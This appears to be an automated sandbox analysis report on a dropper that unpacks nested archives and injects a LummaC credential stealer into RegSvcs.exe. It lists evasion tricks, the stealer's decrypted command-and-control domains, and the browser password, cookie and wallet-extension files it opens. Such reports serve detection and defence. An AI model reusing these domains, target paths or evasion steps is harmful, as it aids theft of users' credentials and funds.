Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ureg.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 3376184 > 1048576
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 0_2_00402665
PE file contains an invalid checksum
Source: Installer.exe.9.dr Static PE information: real checksum: 0x795ad should be: 0xe0b11
Source: 7z.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: 7z.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x7b29e
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004192C0 push eax; ret 0_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0026676A push rcx; ret 5_2_0026676B
Contains functionality to download and launch executables
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task, 11_2_00251280
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe File created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251280 11_2_00251280
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251290 11_2_00251290
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe API coverage: 5.1 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251290 11_2_00251290
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 6412 Thread sleep time: -40000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 0_2_0040367D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 0_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00247978 FindFirstFileW,FindFirstFileW,free, 5_2_00247978
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025A151 FindFirstFileExW, 11_2_0025A151
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 5_2_0024881C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024B5E0 GetSystemInfo, 5_2_0024B5E0
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Thread delayed: delay time: 40000 Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000003.2122322581.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2318932004.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ha^
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4a
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043E470 LdrInitializeThunk, 12_2_0043E470
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_002520FF
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 0_2_00402665
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025B52D mov eax, dword ptr fs:[00000030h] 11_2_0025B52D
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00256B54 mov eax, dword ptr fs:[00000030h] 11_2_00256B54
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025BFD4 GetProcessHeap, 11_2_0025BFD4
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_002520FF
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00252262 SetUnhandledExceptionFilter, 11_2_00252262
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00255E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00255E89
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00252375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00252375

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: p3ar11fter.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: 3xp3cts1aim.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: peepburry828.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: p10tgrace.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: processhol.sbs
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 990008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00402744
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0028D670 cpuid 5_2_0028D670
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 0_2_0040247D
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z, 0_2_004039E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA, 0_2_00405BFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
